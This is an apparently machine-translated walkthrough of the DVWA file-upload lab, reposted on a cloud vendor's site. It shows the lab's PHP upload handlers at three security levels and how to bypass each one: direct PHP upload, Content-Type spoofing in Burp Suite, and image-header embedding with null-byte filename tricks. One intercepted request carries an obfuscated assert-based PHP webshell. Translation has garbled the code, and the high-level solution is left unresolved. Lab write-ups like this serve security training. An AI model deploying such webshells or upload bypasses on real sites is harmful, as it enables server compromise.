DWVA Upload Vulnerability Mining Test example

Source: Internet
Author: User
Tags php file

Low
<?php

if (Isset ($_post[' Upload ')) {
Where are we going to is writing to?
$target _path = Dvwa_web_page_to_root. "Hackable/uploads/";
$target _path. = basename ($_files[' uploaded '] [' name ']);

Can we move the file to the upload folder?
if (!move_uploaded_file ($_files[' uploaded '] [' tmp_name '], $target _path)) {
No
Echo ' <pre>your image is not uploaded.</pre> ';
}
else {
yes!
echo "<pre>{$target _path} succesfully uploaded!</pre>";
}
}

?>
No restrictions on the file type, directly upload the php file, after the visit: http://localhost/hackable/uploads/XX.php can.

Medium
<?php

if (Isset ($_post[' Upload ')) {
Where are we going to is writing to?
$target _path = Dvwa_web_page_to_root. "Hackable/uploads/";
$target _path. = basename ($_files[' uploaded '] [' name ']);

File Information
$uploaded _name = $_files[' uploaded ' [' Name '];
$uploaded _type = $_files[' uploaded '] [' type '];
$uploaded _size = $_files[' uploaded '] [' size '];

Is it an image?
if ($uploaded _type = = "Image/jpeg" | | $uploaded _type = = "Image/png") &&
($uploaded _size < 100000)) {

Can we move the file to the upload folder?
if (!move_uploaded_file ($_files[' uploaded '] [' tmp_name '], $target _path)) {
No
Echo ' <pre>your image is not uploaded.</pre> ';
}
else {
yes!
echo "<pre>{$target _path} succesfully uploaded!</pre>";
}
}
else {
Invalid file
Echo ' <pre>your image is not uploaded. We can only accept JPEG or PNG images.</pre> ';
}
}

?>
Limit the files that are uploaded.
Workaround 1: Use the Burp Suite for 00 truncation, change the file name to 1.php. jpg (Note that there are spaces in the middle), and then change the space to 00 in the Intercept.
Workaround 2: Upload the 2.php file directly after the interception, the packet is as follows


post/vulnerabilities/upload/http/1.1
Host:localhost
user-agent:mozilla/5.0 (Windows NT 6.1; rv:43.0) gecko/20100101 firefox/43.0
accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding:gzip, deflate
referer:http://localhost/vulnerabilities/upload/
cookie:phpsessid=pgke4molj8bath1fmdh7mvt686; Security=medium
Connection:keep-alive
Content-type:multipart/form-data; boundary=---------------------------143381619322555
content-length:549

-----------------------------143381619322555
Content-disposition:form-data; Name= "Max_file_size"

100000
-----------------------------143381619322555
Content-disposition:form-data; Name= "uploaded"; Filename= "2.php"
Content-type:application/octet-stream

<?php

$item [' wind '] = ' assert ';

$array [] = $item;

$array [0][' Wind '] ($_post[' loveautumn ']);

?>
-----------------------------143381619322555
Content-disposition:form-data; Name= "Upload"

Upload
-----------------------------143381619322555--
Change the red part to: Content-type:image/jpeg can be bypassed.


High:
<?php

if (Isset ($_post[' Upload ')) {
Where are we going to is writing to?
$target _path = Dvwa_web_page_to_root. "Hackable/uploads/";
$target _path. = basename ($_files[' uploaded '] [' name ']);

File Information
$uploaded _name = $_files[' uploaded ' [' Name '];
$uploaded _ext = substr ($uploaded _name, Strrpos ($uploaded _name, '. ') + 1);
$uploaded _size = $_files[' uploaded '] [' size '];
$uploaded _tmp = $_files[' uploaded '] [' tmp_name '];

Is it an image?
if (Strtolower ($uploaded _ext) = = "JPG" | | strtolower ($uploaded _ext) = = "JPEG" | | strtolower ($uploaded _ext) = "png ") &&
($uploaded _size < 100000) &&
GetImageSize ($uploaded _tmp)) {

Can we move the file to the upload folder?
if (!move_uploaded_file ($uploaded _tmp, $target _path)) {
No
Echo ' <pre>your image is not uploaded.</pre> ';
}
else {
yes!
echo "<pre>{$target _path} succesfully uploaded!</pre>";
}
}
else {
Invalid file
Echo ' <pre>your image is not uploaded. We can only accept JPEG or PNG images.</pre> ';
}
}

?>
There are strict restrictions on the naming and typing of pictures, so you can solve the problem by using the file head spoofing method. Also, assume that the file name 1.php.png,strrpos will intercept. The last place to appear is 5, after which substr renames the filename from sixth, which means that the file name that was eventually uploaded will be converted to PNG and will be intercepted.
First use Notepad to edit the normal picture file, php a sentence code written to the bottom of the picture, save. This allows the detection of file types to be spoofed.
Finally, the renaming of the filename is bypassed. Change file name to 1.php. PNG upload, intercept with Burpsuite:
Content-disposition:form-data; Name= "uploaded"; The Filename= "1.php. png" section is modified to
Content-disposition:form-data; Name= "uploaded"; Filename= "1.php\x00.php. png" allows you to get a x00.php. png file, which is mentioned in an article in which PHP files have been uploaded with arbitrary file vulnerabilities. Invalid for space truncation. Currently do not know the final answer, it is possible to upload a message containing a JPG file after the adoption of file inclusion to complete? Temporary doubt

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.